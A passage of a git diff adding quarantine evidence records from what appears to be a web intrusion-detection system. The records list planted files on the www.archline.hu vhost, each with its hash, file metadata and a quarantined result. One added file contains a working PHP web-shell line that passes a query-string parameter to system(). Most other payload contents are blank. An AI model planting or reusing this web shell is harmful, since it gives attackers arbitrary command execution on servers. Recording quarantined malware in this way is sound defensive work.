""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/tmp/r0ps_qbi8yu.json.evidence.json b/var/www/hosting/archline.hu/www/tmp/r0ps_qbi8yu.json.evidence.json new file mode 100644 index 0000000..d7d30a3 --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/r0ps_qbi8yu.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3567", + "log_excerpt": "[quarantine] www.archline.hu:tmp/r0ps_qbi8yu.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/tmp/r0ps_qbi8yu.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111785, + "size": 74, + "uid": 20043 + }, + "rel_path": "tmp/r0ps_qbi8yu.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/tmp/r0ps_qbi8yu.php.json b/var/www/hosting/archline.hu/www/tmp/r0ps_qbi8yu.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/r0ps_qbi8yu.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/tmp/r0ps_qbi8yu.php.json.evidence.json b/var/www/hosting/archline.hu/www/tmp/r0ps_qbi8yu.php.json.evidence.json new file mode 100644 index 0000000..db4ee0e --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/r0ps_qbi8yu.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3550", + "log_excerpt": "[quarantine] www.archline.hu:tmp/r0ps_qbi8yu.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/tmp/r0ps_qbi8yu.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111770, + "size": 74, + "uid": 20043 + }, + "rel_path": "tmp/r0ps_qbi8yu.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/tmp/rce_57pqc0.php.json b/var/www/hosting/archline.hu/www/tmp/rce_57pqc0.php.json new file mode 100644 index 0000000..24c02b8 --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/rce_57pqc0.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/tmp/rce_57pqc0.php.json.evidence.json b/var/www/hosting/archline.hu/www/tmp/rce_57pqc0.php.json.evidence.json new file mode 100644 index 0000000..f75a744 --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/rce_57pqc0.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3536", + "log_excerpt": "[quarantine] www.archline.hu:tmp/rce_57pqc0.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/tmp/rce_57pqc0.php.json)", + "original_sha256": "9ba4b855f3bf60b7e6bf5678beca5959f76b278e4fbd911434d08c5ba0f17926", + "original_stat": { + "gid": 30037, + "mtime": 1783813009, + "size": 117, + "uid": 20043 + }, + "rel_path": "tmp/rce_57pqc0.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/tmp/rce_wvln23.php.json b/var/www/hosting/archline.hu/www/tmp/rce_wvln23.php.json new file mode 100644 index 0000000..c1854f3 --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/rce_wvln23.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/tmp/rce_wvln23.php.json.evidence.json b/var/www/hosting/archline.hu/www/tmp/rce_wvln23.php.json.evidence.json new file mode 100644 index 0000000..b2e58e7 --- /dev/null +++ b/var/www/hosting/archline.hu/www/tmp/rce_wvln23.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3565", + "log_excerpt": "[quarantine] www.archline.hu:tmp/rce_wvln23.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/tmp/rce_wvln23.php.json)", + "original_sha256": "eff6ad6424feaa82e756ab3264e8689f6293d56dd50f97e585c9572e2ae4cfaf", + "original_stat": { + "gid": 30037, + "mtime": 1783812921, + "size": 117, + "uid": 20043 + }, + "rel_path": "tmp/rce_wvln23.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/ukls9z5s.php.json b/var/www/hosting/archline.hu/www/ukls9z5s.php.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/ukls9z5s.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/ukls9z5s.php.json.evidence.json b/var/www/hosting/archline.hu/www/ukls9z5s.php.json.evidence.json new file mode 100644 index 0000000..06c11ed --- /dev/null +++ b/var/www/hosting/archline.hu/www/ukls9z5s.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2927", + "log_excerpt": "[quarantine] www.archline.hu:ukls9z5s.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/ukls9z5s.php.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783770041, + "size": 57, + "uid": 20043 + }, + "rel_path": "ukls9z5s.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/up.php.json b/var/www/hosting/archline.hu/www/up.php.json new file mode 100644 index 0000000..d90257a --- /dev/null +++ b/var/www/hosting/archline.hu/www/up.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/up.php.json.evidence.json b/var/www/hosting/archline.hu/www/up.php.json.evidence.json new file mode 100644 index 0000000..705b023 --- /dev/null +++ b/var/www/hosting/archline.hu/www/up.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2895", + "log_excerpt": "[quarantine] www.archline.hu:up.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/up.php.json)", + "original_sha256": "72c1cbd426978b60ec75a15472d96080aa8edf3667d91139557276f7449b2483", + "original_stat": { + "gid": 30037, + "mtime": 1784033938, + "size": 15, + "uid": 20043 + }, + "rel_path": "up.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/uswin7hh.php.json b/var/www/hosting/archline.hu/www/uswin7hh.php.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/uswin7hh.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/uswin7hh.php.json.evidence.json b/var/www/hosting/archline.hu/www/uswin7hh.php.json.evidence.json new file mode 100644 index 0000000..a232f73 --- /dev/null +++ b/var/www/hosting/archline.hu/www/uswin7hh.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2836", + "log_excerpt": "[quarantine] www.archline.hu:uswin7hh.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/uswin7hh.php.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783770033, + "size": 57, + "uid": 20043 + }, + "rel_path": "uswin7hh.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/w271ajkz.php.json b/var/www/hosting/archline.hu/www/w271ajkz.php.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/w271ajkz.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/w271ajkz.php.json.evidence.json b/var/www/hosting/archline.hu/www/w271ajkz.php.json.evidence.json new file mode 100644 index 0000000..f7c0536 --- /dev/null +++ b/var/www/hosting/archline.hu/www/w271ajkz.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2903", + "log_excerpt": "[quarantine] www.archline.hu:w271ajkz.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/w271ajkz.php.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783782444, + "size": 57, + "uid": 20043 + }, + "rel_path": "w271ajkz.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +}